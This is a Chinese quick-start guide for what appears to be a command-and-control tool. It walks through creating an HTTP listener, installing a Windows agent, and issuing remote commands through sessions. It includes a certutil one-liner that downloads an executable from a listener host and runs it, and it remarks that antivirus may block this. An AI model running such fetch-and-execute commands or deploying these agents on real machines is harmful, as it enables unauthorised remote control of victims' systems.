Skip to content

快速开始

1. 新建监听器

进入监听管理页面,点击右边的创建监听器。

监听器名称输入如:http,

监听器端口输入如:1338 , 请确保输入的端口没有被使用和有权限监听。

协议类型选择HTTP

2. 安装探针

在监听器页面,选择安装监听器操作,在弹出的对话框中选择根据实际情况选择对应的命令执行。

在windows下有杀毒软件可能会被拦截。

这里我选择的windows,在cmd中执行如下的命令

certutil -urlcache -gmt -split -f http://ip:1338/d/izdkjhzy izdkjhzy.exe && izdkjhzy.exe agent -u http://ip:1338 -s 83wgnp0d

上面的命令先利用certutil 下载Agent,izdkjhzy 为服务端第一次启动时随机生成的文件名.

再启动agent 子命令,其中83wgnp0dAgent和服务端通信加密密钥,也是服务端第一次启动时随机生成。

3. 会话操作

如果前面操作顺利,那么将会在服务端管理平台自动生成一条会话记录

在会话操作中选择控制台,进入命令下发选项卡可以执行对应的命令,下面的截图是执行了whoami命令和ps 命令。

默认情况下心跳时间为5s, 可以使用sleep 命令进行修改如输入sleep 1,将会将心跳时间修改为1s